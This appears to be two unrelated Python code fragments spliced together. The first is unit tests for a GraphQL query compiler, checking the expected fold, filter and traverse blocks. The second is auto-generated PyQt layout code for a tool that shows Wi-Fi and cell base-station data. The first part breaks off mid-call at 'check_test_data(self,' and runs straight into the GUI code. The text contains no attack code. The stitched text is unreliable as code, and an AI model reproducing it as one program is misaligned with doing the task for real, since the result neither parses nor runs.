'sibling_and_self_species_list': expressions.FoldedOutputContextField(
sibling_fold, 'name', GraphQLList(GraphQLString)),
}),
]
expected_location_types = {
# No MarkLocation blocks are output within folded scopes.
base_location: 'Animal',
parent_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_multiple_outputs_in_same_fold(self):
test_data = test_input_data.multiple_outputs_in_same_fold()
base_location = helpers.Location(('Animal',))
base_fold = helpers.FoldScopeLocation(base_location, ('out', 'Animal_ParentOf'))
expected_blocks = [
blocks.QueryRoot({'Animal'}),
blocks.MarkLocation(base_location),
blocks.Fold(base_fold),
blocks.Unfold(),
blocks.ConstructResult({
'animal_name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
'child_names_list': expressions.FoldedOutputContextField(
base_fold, 'name', GraphQLList(GraphQLString)),
'child_uuids_list': expressions.FoldedOutputContextField(
base_fold, 'uuid', GraphQLList(GraphQLID)),
}),
]
expected_location_types = {
# No MarkLocation blocks are output within folded scopes.
base_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_multiple_outputs_in_same_fold_and_traverse(self):
test_data = test_input_data.multiple_outputs_in_same_fold_and_traverse()
base_location = helpers.Location(('Animal',))
base_fold = helpers.FoldScopeLocation(base_location, ('in', 'Animal_ParentOf'))
parent_location = base_location.navigate_to_subpath('in_Animal_ParentOf')
expected_blocks = [
blocks.QueryRoot({'Animal'}),
blocks.MarkLocation(base_location),
blocks.Fold(base_fold),
blocks.Traverse('out', 'Animal_ParentOf'),
blocks.Backtrack(parent_location),
blocks.Unfold(),
blocks.ConstructResult({
'animal_name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
'sibling_and_self_names_list': expressions.FoldedOutputContextField(
base_fold, 'name', GraphQLList(GraphQLString)),
'sibling_and_self_uuids_list': expressions.FoldedOutputContextField(
base_fold, 'uuid', GraphQLList(GraphQLID)),
}),
]
expected_location_types = {
# No MarkLocation blocks are output within folded scopes.
base_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_multiple_folds(self):
test_data = test_input_data.multiple_folds()
base_location = helpers.Location(('Animal',))
base_out_fold = helpers.FoldScopeLocation(base_location, ('out', 'Animal_ParentOf'))
base_in_fold = helpers.FoldScopeLocation(base_location, ('in', 'Animal_ParentOf'))
expected_blocks = [
blocks.QueryRoot({'Animal'}),
blocks.MarkLocation(base_location),
blocks.Fold(base_out_fold),
blocks.Unfold(),
blocks.Fold(base_in_fold),
blocks.Unfold(),
blocks.ConstructResult({
'animal_name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
'child_names_list': expressions.FoldedOutputContextField(
base_out_fold, 'name', GraphQLList(GraphQLString)),
'child_uuids_list': expressions.FoldedOutputContextField(
base_out_fold, 'uuid', GraphQLList(GraphQLID)),
'parent_names_list': expressions.FoldedOutputContextField(
base_in_fold, 'name', GraphQLList(GraphQLString)),
'parent_uuids_list': expressions.FoldedOutputContextField(
base_in_fold, 'uuid', GraphQLList(GraphQLID)),
}),
]
expected_location_types = {
# No MarkLocation blocks are output within folded scopes.
base_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_multiple_folds_and_traverse(self):
test_data = test_input_data.multiple_folds_and_traverse()
base_location = helpers.Location(('Animal',))
base_out_fold = helpers.FoldScopeLocation(base_location, ('out', 'Animal_ParentOf'))
base_out_location = base_location.navigate_to_subpath('out_Animal_ParentOf')
base_in_fold = helpers.FoldScopeLocation(base_location, ('in', 'Animal_ParentOf'))
base_in_location = base_location.navigate_to_subpath('in_Animal_ParentOf')
expected_blocks = [
blocks.QueryRoot({'Animal'}),
blocks.MarkLocation(base_location),
blocks.Fold(base_out_fold),
blocks.Traverse('in', 'Animal_ParentOf'),
blocks.Backtrack(base_out_location),
blocks.Unfold(),
blocks.Fold(base_in_fold),
blocks.Traverse('out', 'Animal_ParentOf'),
blocks.Backtrack(base_in_location),
blocks.Unfold(),
blocks.ConstructResult({
'animal_name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
'spouse_and_self_names_list': expressions.FoldedOutputContextField(
base_out_fold, 'name', GraphQLList(GraphQLString)),
'spouse_and_self_uuids_list': expressions.FoldedOutputContextField(
base_out_fold, 'uuid', GraphQLList(GraphQLID)),
'sibling_and_self_names_list': expressions.FoldedOutputContextField(
base_in_fold, 'name', GraphQLList(GraphQLString)),
'sibling_and_self_uuids_list': expressions.FoldedOutputContextField(
base_in_fold, 'uuid', GraphQLList(GraphQLID)),
}),
]
expected_location_types = {
# No MarkLocation blocks are output within folded scopes.
base_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_fold_date_and_datetime_fields(self):
test_data = test_input_data.fold_date_and_datetime_fields()
base_location = helpers.Location(('Animal',))
base_parent_fold = helpers.FoldScopeLocation(base_location, ('out', 'Animal_ParentOf'))
base_fed_at_fold = helpers.FoldScopeLocation(base_location, ('out', 'Animal_FedAt'))
expected_blocks = [
blocks.QueryRoot({'Animal'}),
blocks.MarkLocation(base_location),
blocks.Fold(base_parent_fold),
blocks.Unfold(),
blocks.Fold(base_fed_at_fold),
blocks.Unfold(),
blocks.ConstructResult({
'animal_name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
'child_birthdays_list': expressions.FoldedOutputContextField(
base_parent_fold, 'birthday', GraphQLList(GraphQLDate)),
'fed_at_datetimes_list': expressions.FoldedOutputContextField(
base_fed_at_fold, 'event_date', GraphQLList(GraphQLDateTime)),
}),
]
expected_location_types = {
# No MarkLocation blocks are output within folded scopes.
base_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_coercion_to_union_base_type_inside_fold(self):
# Given type_equivalence_hints = { Event: EventOrBirthEvent },
# the coercion should be optimized away as a no-op.
test_data = test_input_data.coercion_to_union_base_type_inside_fold()
base_location = helpers.Location(('Animal',))
base_parent_fold = helpers.FoldScopeLocation(
base_location, ('out', 'Animal_ImportantEvent'))
expected_blocks = [
blocks.QueryRoot({'Animal'}),
blocks.MarkLocation(base_location),
blocks.Fold(base_parent_fold),
blocks.Unfold(),
blocks.ConstructResult({
'animal_name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
'important_events': expressions.FoldedOutputContextField(
base_parent_fold, 'name', GraphQLList(GraphQLString)),
}),
]
expected_location_types = {
# No MarkLocation blocks are output within folded scopes.
base_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_coercion_filters_and_multiple_outputs_within_fold_scope(self):
test_data = test_input_data.coercion_filters_and_multiple_outputs_within_fold_scope()
base_location = helpers.Location(('Animal',))
entity_fold = helpers.FoldScopeLocation(base_location, ('out', 'Entity_Related'))
expected_blocks = [
blocks.QueryRoot({'Animal'}),
blocks.MarkLocation(base_location),
blocks.Fold(entity_fold),
blocks.CoerceType({'Animal'}),
blocks.Filter(expressions.BinaryComposition(
u'has_substring',
expressions.LocalField('name'),
expressions.Variable('$substring', GraphQLString)
)),
blocks.Filter(
expressions.BinaryComposition(
u'<=',
expressions.LocalField('birthday'),
expressions.Variable('$latest', GraphQLDate)
)
),
blocks.Unfold(),
blocks.ConstructResult({
'related_animals': expressions.FoldedOutputContextField(
entity_fold, 'name', GraphQLList(GraphQLString)),
'name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
'related_birthdays': expressions.FoldedOutputContextField(
entity_fold, 'birthday', GraphQLList(GraphQLDate)),
}),
]
expected_location_types = {
# No MarkLocation blocks are output within folded scopes.
base_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_coercion_filters_and_multiple_outputs_within_fold_traversal(self):
test_data = test_input_data.coercion_filters_and_multiple_outputs_within_fold_traversal()
base_location = helpers.Location(('Animal',))
parent_fold = helpers.FoldScopeLocation(base_location, ('in', 'Animal_ParentOf'))
parent_location = base_location.navigate_to_subpath('in_Animal_ParentOf')
expected_blocks = [
blocks.QueryRoot({'Animal'}),
blocks.MarkLocation(base_location),
blocks.Fold(parent_fold),
blocks.Traverse('out', 'Entity_Related'),
blocks.CoerceType({'Animal'}),
blocks.Filter(expressions.BinaryComposition(
u'has_substring',
expressions.LocalField('name'),
expressions.Variable('$substring', GraphQLString)
)),
blocks.Filter(
expressions.BinaryComposition(
u'<=',
expressions.LocalField('birthday'),
expressions.Variable('$latest', GraphQLDate)
)
),
blocks.Backtrack(parent_location),
blocks.Unfold(),
blocks.ConstructResult({
'related_animals': expressions.FoldedOutputContextField(
parent_fold, 'name', GraphQLList(GraphQLString)),
'name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
'related_birthdays': expressions.FoldedOutputContextField(
parent_fold, 'birthday', GraphQLList(GraphQLDate)),
}),
]
expected_location_types = {
# No MarkLocation blocks are output within folded scopes.
base_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_no_op_coercion_inside_fold(self):
# The type where the coercion is applied is already Entity, so the coercion is a no-op.
test_data = test_input_data.no_op_coercion_inside_fold()
base_location = helpers.Location(('Animal',))
base_parent_fold = helpers.FoldScopeLocation(
base_location, ('out', 'Entity_Related'))
expected_blocks = [
blocks.QueryRoot({'Animal'}),
blocks.MarkLocation(base_location),
blocks.Fold(base_parent_fold),
blocks.Unfold(),
blocks.ConstructResult({
'animal_name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
'related_entities': expressions.FoldedOutputContextField(
base_parent_fold, 'name', GraphQLList(GraphQLString)),
}),
]
expected_location_types = {
# No MarkLocation blocks are output within folded scopes.
base_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_filter_within_fold_scope(self):
test_data = test_input_data.filter_within_fold_scope()
base_location = helpers.Location(('Animal',))
base_parent_fold = helpers.FoldScopeLocation(base_location, ('out', 'Animal_ParentOf'))
expected_blocks = [
blocks.QueryRoot({'Animal'}),
blocks.MarkLocation(base_location),
blocks.Fold(base_parent_fold),
blocks.Filter(
expressions.BinaryComposition(
u'=',
expressions.LocalField('name'),
expressions.Variable('$desired', GraphQLString)
)
),
blocks.Unfold(),
blocks.ConstructResult({
'name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
'child_list': expressions.FoldedOutputContextField(
base_parent_fold, 'name', GraphQLList(GraphQLString)),
'child_descriptions': expressions.FoldedOutputContextField(
base_parent_fold, 'description', GraphQLList(GraphQLString)),
}),
]
expected_location_types = {
# No MarkLocation blocks are output within folded scopes.
base_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_filter_on_fold_scope(self):
test_data = test_input_data.filter_on_fold_scope()
base_location = helpers.Location(('Animal',))
base_parent_fold = helpers.FoldScopeLocation(base_location, ('out', 'Animal_ParentOf'))
expected_blocks = [
blocks.QueryRoot({'Animal'}),
blocks.MarkLocation(base_location),
blocks.Fold(base_parent_fold),
blocks.Filter(
expressions.BinaryComposition(
u'||',
expressions.BinaryComposition(
u'=',
expressions.LocalField('name'),
expressions.Variable('$desired', GraphQLString)
),
expressions.BinaryComposition(
u'contains',
expressions.LocalField('alias'),
expressions.Variable('$desired', GraphQLString)
)
)
),
blocks.Unfold(),
blocks.ConstructResult({
'name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
'child_list': expressions.FoldedOutputContextField(
base_parent_fold, 'name', GraphQLList(GraphQLString)),
}),
]
expected_location_types = {
# No MarkLocation blocks are output within folded scopes.
base_location: 'Animal',
}
check_test_data(self, | |
self.main_tbShowWifi = QtWidgets.QTextBrowser(self.groupBox_16)
font = QtGui.QFont()
font.setPointSize(9)
self.main_tbShowWifi.setFont(font)
self.main_tbShowWifi.setObjectName("main_tbShowWifi")
self.verticalLayout_58.addWidget(self.main_tbShowWifi)
self.verticalLayout_11.addLayout(self.verticalLayout_58)
self.groupBox_2 = QtWidgets.QGroupBox(self.splitter_13)
self.groupBox_2.setMaximumSize(QtCore.QSize(400, 16777215))
self.groupBox_2.setObjectName("groupBox_2")
self.verticalLayout_10 = QtWidgets.QVBoxLayout(self.groupBox_2)
self.verticalLayout_10.setObjectName("verticalLayout_10")
self.splitter_5 = QtWidgets.QSplitter(self.groupBox_2)
self.splitter_5.setOrientation(QtCore.Qt.Vertical)
self.splitter_5.setObjectName("splitter_5")
self.layoutWidget6 = QtWidgets.QWidget(self.splitter_5)
self.layoutWidget6.setObjectName("layoutWidget6")
self.verticalLayout_6 = QtWidgets.QVBoxLayout(self.layoutWidget6)
self.verticalLayout_6.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_6.setObjectName("verticalLayout_6")
self.verticalLayout_31 = QtWidgets.QVBoxLayout()
self.verticalLayout_31.setObjectName("verticalLayout_31")
self.label_3 = QtWidgets.QLabel(self.layoutWidget6)
self.label_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_3.setObjectName("label_3")
self.verticalLayout_31.addWidget(self.label_3)
self.verticalLayout_30 = QtWidgets.QVBoxLayout()
self.verticalLayout_30.setObjectName("verticalLayout_30")
self.horizontalLayout_23 = QtWidgets.QHBoxLayout()
self.horizontalLayout_23.setObjectName("horizontalLayout_23")
self.label_5 = QtWidgets.QLabel(self.layoutWidget6)
self.label_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_5.setObjectName("label_5")
self.horizontalLayout_23.addWidget(self.label_5)
self.main_editLAT_FindBS = QtWidgets.QLineEdit(self.layoutWidget6)
self.main_editLAT_FindBS.setMinimumSize(QtCore.QSize(80, 0))
self.main_editLAT_FindBS.setMaximumSize(QtCore.QSize(140, 16777215))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(9)
font.setBold(False)
font.setWeight(50)
self.main_editLAT_FindBS.setFont(font)
self.main_editLAT_FindBS.setAlignment(QtCore.Qt.AlignCenter)
self.main_editLAT_FindBS.setClearButtonEnabled(False)
self.main_editLAT_FindBS.setObjectName("main_editLAT_FindBS")
self.horizontalLayout_23.addWidget(self.main_editLAT_FindBS)
spacerItem31 = QtWidgets.QSpacerItem(10, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_23.addItem(spacerItem31)
self.main_editLON_FindBS = QtWidgets.QLineEdit(self.layoutWidget6)
self.main_editLON_FindBS.setMinimumSize(QtCore.QSize(80, 0))
self.main_editLON_FindBS.setMaximumSize(QtCore.QSize(140, 16777215))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(9)
font.setBold(False)
font.setWeight(50)
self.main_editLON_FindBS.setFont(font)
self.main_editLON_FindBS.setAlignment(QtCore.Qt.AlignCenter)
self.main_editLON_FindBS.setClearButtonEnabled(False)
self.main_editLON_FindBS.setObjectName("main_editLON_FindBS")
self.horizontalLayout_23.addWidget(self.main_editLON_FindBS)
spacerItem32 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_23.addItem(spacerItem32)
self.verticalLayout_30.addLayout(self.horizontalLayout_23)
self.horizontalLayout_26 = QtWidgets.QHBoxLayout()
self.horizontalLayout_26.setObjectName("horizontalLayout_26")
self.horizontalLayout_25 = QtWidgets.QHBoxLayout()
self.horizontalLayout_25.setObjectName("horizontalLayout_25")
self.label_4 = QtWidgets.QLabel(self.layoutWidget6)
self.label_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_4.setObjectName("label_4")
self.horizontalLayout_25.addWidget(self.label_4)
self.main_editRadius = QtWidgets.QLineEdit(self.layoutWidget6)
self.main_editRadius.setMaximumSize(QtCore.QSize(50, 16777215))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(9)
font.setBold(False)
font.setWeight(50)
self.main_editRadius.setFont(font)
self.main_editRadius.setAlignment(QtCore.Qt.AlignCenter)
self.main_editRadius.setClearButtonEnabled(False)
self.main_editRadius.setObjectName("main_editRadius")
self.horizontalLayout_25.addWidget(self.main_editRadius)
spacerItem33 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_25.addItem(spacerItem33)
self.horizontalLayout_26.addLayout(self.horizontalLayout_25)
self.main_check_mapShow = QtWidgets.QCheckBox(self.layoutWidget6)
self.main_check_mapShow.setObjectName("main_check_mapShow")
self.horizontalLayout_26.addWidget(self.main_check_mapShow)
self.verticalLayout_30.addLayout(self.horizontalLayout_26)
self.verticalLayout_31.addLayout(self.verticalLayout_30)
self.verticalLayout_6.addLayout(self.verticalLayout_31)
self.horizontalLayout_24 = QtWidgets.QHBoxLayout()
self.horizontalLayout_24.setObjectName("horizontalLayout_24")
self.label_13 = QtWidgets.QLabel(self.layoutWidget6)
self.label_13.setObjectName("label_13")
self.horizontalLayout_24.addWidget(self.label_13)
self.cb_ModeBTSShowing = QtWidgets.QComboBox(self.layoutWidget6)
self.cb_ModeBTSShowing.setObjectName("cb_ModeBTSShowing")
self.cb_ModeBTSShowing.addItem("")
self.cb_ModeBTSShowing.addItem("")
self.horizontalLayout_24.addWidget(self.cb_ModeBTSShowing)
spacerItem34 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_24.addItem(spacerItem34)
self.main_pb_ShowBStations = QtWidgets.QPushButton(self.layoutWidget6)
self.main_pb_ShowBStations.setMinimumSize(QtCore.QSize(100, 0))
self.main_pb_ShowBStations.setMaximumSize(QtCore.QSize(100, 23))
self.main_pb_ShowBStations.setAutoRepeat(False)
self.main_pb_ShowBStations.setAutoDefault(False)
self.main_pb_ShowBStations.setDefault(False)
self.main_pb_ShowBStations.setFlat(False)
self.main_pb_ShowBStations.setObjectName("main_pb_ShowBStations")
self.horizontalLayout_24.addWidget(self.main_pb_ShowBStations)
self.main_pb_clearShowBStations = QtWidgets.QPushButton(self.layoutWidget6)
self.main_pb_clearShowBStations.setMinimumSize(QtCore.QSize(23, 23))
self.main_pb_clearShowBStations.setMaximumSize(QtCore.QSize(23, 23))
self.main_pb_clearShowBStations.setText("")
self.main_pb_clearShowBStations.setObjectName("main_pb_clearShowBStations")
self.horizontalLayout_24.addWidget(self.main_pb_clearShowBStations)
spacerItem35 = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_24.addItem(spacerItem35)
self.verticalLayout_6.addLayout(self.horizontalLayout_24)
self.tbrwsr_ShowBStations = QtWidgets.QTextBrowser(self.layoutWidget6)
self.tbrwsr_ShowBStations.setObjectName("tbrwsr_ShowBStations")
self.verticalLayout_6.addWidget(self.tbrwsr_ShowBStations)
self.layoutWidget7 = QtWidgets.QWidget(self.splitter_5)
self.layoutWidget7.setObjectName("layoutWidget7")
self.verticalLayout_8 = QtWidgets.QVBoxLayout(self.layoutWidget7)
self.verticalLayout_8.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_8.setObjectName("verticalLayout_8")
self.line_3 = QtWidgets.QFrame(self.layoutWidget7)
self.line_3.setFrameShape(QtWidgets.QFrame.HLine)
self.line_3.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_3.setObjectName("line_3")
self.verticalLayout_8.addWidget(self.line_3)
self.verticalLayout_7 = QtWidgets.QVBoxLayout()
self.verticalLayout_7.setObjectName("verticalLayout_7")
self.horizontalLayout_19 = QtWidgets.QHBoxLayout()
self.horizontalLayout_19.setObjectName("horizontalLayout_19")
spacerItem36 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_19.addItem(spacerItem36)
self.label_6 = QtWidgets.QLabel(self.layoutWidget7)
self.label_6.setObjectName("label_6")
self.horizontalLayout_19.addWidget(self.label_6)
spacerItem37 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_19.addItem(spacerItem37)
self.verticalLayout_7.addLayout(self.horizontalLayout_19)
self.splitter_3 = QtWidgets.QSplitter(self.layoutWidget7)
self.splitter_3.setOrientation(QtCore.Qt.Horizontal)
self.splitter_3.setObjectName("splitter_3")
self.layoutWidget8 = QtWidgets.QWidget(self.splitter_3)
self.layoutWidget8.setObjectName("layoutWidget8")
self.horizontalLayout_7 = QtWidgets.QHBoxLayout(self.layoutWidget8)
self.horizontalLayout_7.setContentsMargins(2, 0, 2, 0)
self.horizontalLayout_7.setObjectName("horizontalLayout_7")
spacerItem38 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_7.addItem(spacerItem38)
self.label_9 = QtWidgets.QLabel(self.layoutWidget8)
self.label_9.setObjectName("label_9")
self.horizontalLayout_7.addWidget(self.label_9)
self.le_BTSGeo_mcc = QtWidgets.QLineEdit(self.layoutWidget8)
self.le_BTSGeo_mcc.setText("")
self.le_BTSGeo_mcc.setMaxLength(999999999)
self.le_BTSGeo_mcc.setFrame(True)
self.le_BTSGeo_mcc.setObjectName("le_BTSGeo_mcc")
self.horizontalLayout_7.addWidget(self.le_BTSGeo_mcc)
self.layoutWidget9 = QtWidgets.QWidget(self.splitter_3)
self.layoutWidget9.setObjectName("layoutWidget9")
self.horizontalLayout_9 = QtWidgets.QHBoxLayout(self.layoutWidget9)
self.horizontalLayout_9.setContentsMargins(2, 0, 2, 0)
self.horizontalLayout_9.setObjectName("horizontalLayout_9")
self.label_10 = QtWidgets.QLabel(self.layoutWidget9)
self.label_10.setObjectName("label_10")
self.horizontalLayout_9.addWidget(self.label_10)
self.le_BTSGeo_mnc = QtWidgets.QLineEdit(self.layoutWidget9)
self.le_BTSGeo_mnc.setText("")
self.le_BTSGeo_mnc.setObjectName("le_BTSGeo_mnc")
self.horizontalLayout_9.addWidget(self.le_BTSGeo_mnc)
self.layoutWidget10 = QtWidgets.QWidget(self.splitter_3)
self.layoutWidget10.setObjectName("layoutWidget10")
self.horizontalLayout_12 = QtWidgets.QHBoxLayout(self.layoutWidget10)
self.horizontalLayout_12.setContentsMargins(2, 0, 2, 0)
self.horizontalLayout_12.setObjectName("horizontalLayout_12")
self.label_11 = QtWidgets.QLabel(self.layoutWidget10)
self.label_11.setObjectName("label_11")
self.horizontalLayout_12.addWidget(self.label_11)
self.le_BTSGeo_lac = QtWidgets.QLineEdit(self.layoutWidget10)
self.le_BTSGeo_lac.setText("")
self.le_BTSGeo_lac.setObjectName("le_BTSGeo_lac")
self.horizontalLayout_12.addWidget(self.le_BTSGeo_lac)
self.layoutWidget11 = QtWidgets.QWidget(self.splitter_3)
self.layoutWidget11.setObjectName("layoutWidget11")
self.horizontalLayout_13 = QtWidgets.QHBoxLayout(self.layoutWidget11)
self.horizontalLayout_13.setContentsMargins(2, 0, 2, 0)
self.horizontalLayout_13.setObjectName("horizontalLayout_13")
self.label_12 = QtWidgets.QLabel(self.layoutWidget11)
self.label_12.setObjectName("label_12")
self.horizontalLayout_13.addWidget(self.label_12)
self.le_BTSGeo_cid = QtWidgets.QLineEdit(self.layoutWidget11)
self.le_BTSGeo_cid.setText("")
self.le_BTSGeo_cid.setObjectName("le_BTSGeo_cid")
self.horizontalLayout_13.addWidget(self.le_BTSGeo_cid)
spacerItem39 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_13.addItem(spacerItem39)
self.verticalLayout_7.addWidget(self.splitter_3)
self.horizontalLayout_42 = QtWidgets.QHBoxLayout()
self.horizontalLayout_42.setObjectName("horizontalLayout_42")
spacerItem40 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_42.addItem(spacerItem40)
self.main_pb_ShowBTSGeo = QtWidgets.QPushButton(self.layoutWidget7)
self.main_pb_ShowBTSGeo.setMinimumSize(QtCore.QSize(100, 0))
self.main_pb_ShowBTSGeo.setMaximumSize(QtCore.QSize(100, 23))
self.main_pb_ShowBTSGeo.setAutoRepeat(False)
self.main_pb_ShowBTSGeo.setAutoDefault(False)
self.main_pb_ShowBTSGeo.setDefault(False)
self.main_pb_ShowBTSGeo.setFlat(False)
self.main_pb_ShowBTSGeo.setObjectName("main_pb_ShowBTSGeo")
self.horizontalLayout_42.addWidget(self.main_pb_ShowBTSGeo)
self.main_pb_clearShowBTSGeo = QtWidgets.QPushButton(self.layoutWidget7)
self.main_pb_clearShowBTSGeo.setMinimumSize(QtCore.QSize(23, 23))
self.main_pb_clearShowBTSGeo.setMaximumSize(QtCore.QSize(23, 23))
self.main_pb_clearShowBTSGeo.setText("")
self.main_pb_clearShowBTSGeo.setObjectName("main_pb_clearShowBTSGeo")
self.horizontalLayout_42.addWidget(self.main_pb_clearShowBTSGeo)
spacerItem41 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_42.addItem(spacerItem41)
self.verticalLayout_7.addLayout(self.horizontalLayout_42)
self.textBrowser_BTSGeo = QtWidgets.QTextBrowser(self.layoutWidget7)
self.textBrowser_BTSGeo.setObjectName("textBrowser_BTSGeo")
self.verticalLayout_7.addWidget(self.textBrowser_BTSGeo)
self.verticalLayout_8.addLayout(self.verticalLayout_7)
self.verticalLayout_10.addWidget(self.splitter_5)
self.horizontalLayout_18.addWidget(self.splitter_13)
self.tabMain.addTab(self.tabGSM, "")
self.horizontalLayout_17.addWidget(self.tabMain)
self.groupBox_3 = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_3.setMinimumSize(QtCore.QSize(257, 0))
self.groupBox_3.setMaximumSize(QtCore.QSize(257, 16777215))
self.groupBox_3.setObjectName("groupBox_3")
self.verticalLayout_37 = QtWidgets.QVBoxLayout(self.groupBox_3)
self.verticalLayout_37.setObjectName("verticalLayout_37")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.groupBox = QtWidgets.QGroupBox(self.groupBox_3)
self.groupBox.setMaximumSize(QtCore.QSize(16777215, 109))
self.groupBox.setObjectName("groupBox")
self.verticalLayout_41 = QtWidgets.QVBoxLayout(self.groupBox)
self.verticalLayout_41.setObjectName("verticalLayout_41")
self.verticalLayout_40 = QtWidgets.QVBoxLayout()
self.verticalLayout_40.setSpacing(11)
self.verticalLayout_40.setObjectName("verticalLayout_40")
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setContentsMargins(-1, 4, -1, -1)
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.vk_labelUrlPict = QtWidgets.QLabel(self.groupBox)
self.vk_labelUrlPict.setObjectName("vk_labelUrlPict")
self.horizontalLayout_6.addWidget(self.vk_labelUrlPict)
self.vk_editShowPict = QtWidgets.QLineEdit(self.groupBox)
self.vk_editShowPict.setAlignment(QtCore.Qt.AlignCenter)
self.vk_editShowPict.setClearButtonEnabled(True)
self.vk_editShowPict.setObjectName("vk_editShowPict")
self.horizontalLayout_6.addWidget(self.vk_editShowPict)
self.verticalLayout_40.addLayout(self.horizontalLayout_6)
self.horizontalLayout_33 = QtWidgets.QHBoxLayout()
self.horizontalLayout_33.setObjectName("horizontalLayout_33")
spacerItem42 = QtWidgets.QSpacerItem(46, 17, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_33.addItem(spacerItem42)
self.vk_pbShowPict = QtWidgets.QPushButton(self.groupBox)
self.vk_pbShowPict.setMinimumSize(QtCore.QSize(100, 0))
self.vk_pbShowPict.setObjectName("vk_pbShowPict")
self.horizontalLayout_33.addWidget(self.vk_pbShowPict)
spacerItem43 = QtWidgets.QSpacerItem(45, 17, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_33.addItem(spacerItem43)
self.verticalLayout_40.addLayout(self.horizontalLayout_33)
self.verticalLayout_41.addLayout(self.verticalLayout_40)
self.verticalLayout.addWidget(self.groupBox)
self.groupBox_6 = QtWidgets.QGroupBox(self.groupBox_3)
self.groupBox_6.setObjectName("groupBox_6")
self.verticalLayout_42 = QtWidgets.QVBoxLayout(self.groupBox_6)
self.verticalLayout_42.setObjectName("verticalLayout_42")
self.main_Notebook = QtWidgets.QPlainTextEdit(self.groupBox_6)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 229, 164))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(239, 242, 209))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(112, 114, 82))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(149, 153, 109))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
